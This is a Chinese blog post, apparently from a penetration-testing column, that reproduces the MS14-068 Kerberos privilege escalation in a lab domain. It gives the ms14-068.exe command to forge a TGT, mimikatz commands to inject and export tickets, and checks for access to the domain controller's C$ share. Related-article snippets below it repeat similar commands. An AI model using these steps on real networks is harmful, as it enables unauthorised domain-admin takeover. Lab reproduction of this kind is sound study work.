MS14-068复现

最新推荐文章于 2025-05-10 17:25:14 发布
最新推荐文章于 2025-05-10 17:25:14 发布
阅读量764 收藏
点赞数
分类专栏: 内网渗透 文章标签: 内网渗透
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.youkuaiyun.com/q1352483315/article/details/100855196
版权

kerberos认证流程非常的重要

1、生成TGT:

net config workstation

在这里插入图片描述

ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top

在这里插入图片描述
生成的票据:
在这里插入图片描述

2、注入TGT:

1)先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功

klist

在这里插入图片描述
清理原来的票据:klist purge
在这里插入图片描述
在这里插入图片描述
原因:https://www.t00ls.net/viewthread.php?tid=28727

2)利用mimikatz进行注入

非交互式中直接执行一句话
mimikatz.exe "kerberos::ptc TGT_yuyonghu01@top.pentest.top.ccache" exit

注入成功!
在这里插入图片描述

查看票据:

klist

在这里插入图片描述
尝试访问域服务器

dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

在这里插入图片描述
漏洞:MS14-068 补丁编号kb3011780

查看是否打补丁:systeminfo |find "3011780"

Export the ticket:

在我们成功获得域控权限后,就可以导出域控内存中的Ticket,在默认的10个小时以内都可以利用来登录域控

通过mimikatz导出内存中的Ticket,执行:

sekurlsa::tickets /export

如图:
在这里插入图片描述

挑选其中的[0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kribi在域普通用户的主机进行导入

在这里插入图片描述

导入:

mimikatz "kerberos::ptt [0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kirbi"

在这里插入图片描述
尝试访问域控服务器:

dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

成功!
在这里插入图片描述

复现MS14-068
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
05-23 1217
MS14-068
MS14-068 漏洞复现
box
03-24 1037
0x00 漏洞成因 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证 简单来说就是: windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。 在请求AS时,
MS14-068(域提权)漏洞复现
weixin_50985113的博客
06-29 937
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
2025-05-10-渗透测试:MS14-068漏洞利用、复现黄金票据(随笔)
最新发布
ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ虽然我不知道为什么ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
05-10 1025
Kerberos是一种由MIT提出的网络认证协议,基于对称加密技术(如AES)实现客户端与服务端之间的强身份验证,核心目标是通过票据(Ticket)机制避免明文传输密码,确保安全认证。其核心组件包括KDC(密钥分发中心)、TGT(票据授权票据)、ST(服务票据)和PAC(特权属性证书)。认证流程分为六步,涉及AS_REQ/AS_REP、TGS_REQ/TGS_REP和AP_REQ/AP_REP等消息交换。Kerberos的关键数据结构包括TGT和PAC,加密类型常见为AES256和RC4。MS14-068
ms14-068复现
weixin_54806373的博客
11-18 346
MS14-068复现 域控制器:windows2008 R2 test.com 192.168.146.138 域内机器:Windows7 1.查看漏洞是否存在 systeminfo 发现没有打相关补丁,漏洞存在 2.配置windows sever2008 R2 打开cmd输入 dcpromo 安装完成后得到结果(详细过程见windows sever2008 R2环境配置) 3.配置windows7 打开网络进行配置 将DNS配置为Windows sever 2008R2的IP 连接成功
MS14-068漏洞复现
一纸荒芜的博客
08-26 3713
ms14-068漏洞复现
MS14-068漏洞复现
2ed
11-18 1465
背景 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft WindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变...
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
渗透☀️MS14-068☀️漏洞复现
君莫hacker的博客
09-11 1258
目录0x01 漏洞介绍0x02 环境准备0x03 漏洞复现1. 查看当前用户是否为域用户2. 获取域控信息3. 查看目前权限4. “MS14-068” 工具生成票据5. 打开mimikatz,注入票据6. 验证权限是否提升7. 使用PsExec.exe获取一个交互式shell8. 创建用户,并添加至域管理员组 0x01 漏洞介绍 漏洞概述: 该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。 漏洞编号 CVE-2014-6324 受影响版本 全部版本Windows服务器
MS14-068 复现
prettyX的博客
12-25 746
前言 1、Kerberos协议在过去几年被曝光了一些漏洞,一个影响最大的漏洞是MS14-068。 2、漏洞效果:域用户利用该漏洞可以获取域管理员权限。 3、MS14-068 CVE编号:CVE-2014-6324;补丁号为KB3011780。 环境准备 域环境:本地搭建 域用户主机:Win7 sp1 32位 工具:mimikatz、ms14-068.exe 复现 1、域控漏...
内网渗透--MS14-068复现
ximo的博客
04-11 392
漏洞概述 该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。 影响版本 全部版本Windows服务器 环境搭建 域:hack.com 域控:win 2008 R2 192.168.133.100 域内主机:win 7 192.168.133.101 复现过程 假设已经获得了域内主机win 7的控制权;查看用户是否为域用户: net user hack1 /domain 获取域控信息: net group "domain controllers" /domain pi
ms14-068.exe域内神器
11-25
ms14-068.exe域内神器
MS14-068AD域提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
MS14_068域提权漏洞复现
ninnjnjn的博客
04-02 783
MS14_068域提权漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授权的域用户账户的权限,提权到域管理员的权限 2.漏洞原理 3.漏洞利用前提 (1)域控主机没有打MS14_068的补丁 (2)攻击者拿下了一台域内主机的普通计算机,并获得普通域用户名以及密码/hash值,和用户的suid 4.实验环境 域控主机windows 2008R2 192.168.164.55 域内主机windows ...
微软发布带外安全更新MS14-068
微软大中华区安全博客
11-19 4033
11月19日,微软发布了带外更新MS14-068以解决Windows 系统中的一个安全漏洞,该补丁安全等级为“严重”。MS14-068 | Kerberos 中的漏洞可能允许特权提升该安全更新解决了Windows Kerberos KDC 中一个秘密报告的漏洞。该漏洞可能允许普通域账户提升特权,进而获得域管理员的权限。攻击者要想成功利用该漏洞,其必须首先又有一个有效的域账户。针对该漏洞,微软已
MS14_068利用
weixin_45682070的博客
05-25 559
假设已经获得TargetShell,并且在域环境中并未打ms14_068的相关补丁 接下来我们进行利用 通过上篇文章的信息搜集(https://blog.youkuaiyun.com/weixin_45682070/article/details/106337762) 首先GitHub上下载ms14_068的利用脚本pykek python ms14-068.py -u whale@DC.com -s S-1-5-21-2867916317-3317112163-957300651-1113 -d 192.168.17
ms14-068的深入分析
zz_strive_2012的专栏
06-17 5296
0×0 背景 初次认识该漏洞是在FreeBuf上对该漏洞的预警《漏洞预警:系统权限提升漏洞(CVE-2014-6324)影响全版本Windows服务器》: 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-
MS14-068实验软件:深入研究与应用
因此,MS14-068实验用软件很可能是一个用于教学或研究目的的工具,它可能包含漏洞利用代码、攻击模拟脚本、修补前后的系统环境等,以便让研究者或安全从业者可以安全地复现这个漏洞,并且学习如何防御类似的攻击。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值